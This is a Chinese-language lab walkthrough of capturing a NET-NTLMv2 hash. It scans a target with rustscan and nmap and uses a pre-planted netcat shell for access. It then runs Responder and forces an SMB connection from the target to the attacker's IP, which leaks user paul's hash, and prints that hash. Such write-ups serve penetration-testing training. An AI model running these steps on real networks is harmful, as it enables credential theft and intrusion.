NET-NTLMv2 密碼破解
NET-NTLMv2 密碼破解 靶機 IP : 192.168.197.211 第一步 rustscan,└─$ rustscan -a 192.168.197.211 --scripts none --ulimit 500 135、139、445、3389、4444、5555、5985、47001、etc... nmap 列舉這幾個 Port,└─$ sudo nmap -sV -sC -p 135,139,445,3389,4444,5555,5985 192.168.197.211 上圖可以看到有一個 4444 Port 是 krb524,透過 nc 直接連接時發現可以直接拿到 shell 這是因為有一個假設的前提,前提是我們已經有透過 paul 帳號初步滲透並在對方的 4444 Port 上綁定了 Remote Shell,所以此時才能直接使用 nc 進行 remote shell 連接 執行 ipconfig 確認是該台機器的 shell,whoami 查看使用者是 paul 透過 net user paul 查看使用者的進一步資訊,僅隸屬於遠端桌面群組 在我們的攻擊機上執行 ip a 查看相關 Interface 介面與資訊,我們需要的是 tun0 這個介面 192.168.45.228 是我們攻擊機的與靶機有路由的介面 IP 執行 └─$ sudo responder -I tun0,於介面 tun0 上啟動 responder 監聽,接下來主要要透過 SMB 這個服務來監聽所有傳入的驗證,確認 SMB 服務在 responder 是 ON 的狀態 接下來從剛剛的 remote shell 執行 dir \\192.168.45.228\test,可以看到存取失敗 在 responder 服務上可以看到從靶機傳過來的驗證,使用者是 FILES01\paul,密碼是雜湊如下 paul::FILES01:f9d057cea7136add:883BA6449490AD7910962CEDAF7DA112:01010000000000008017673550EBD901F4031B80844971500000000002000800310050003500500001001E00570049004E002D00370037005A0044003500...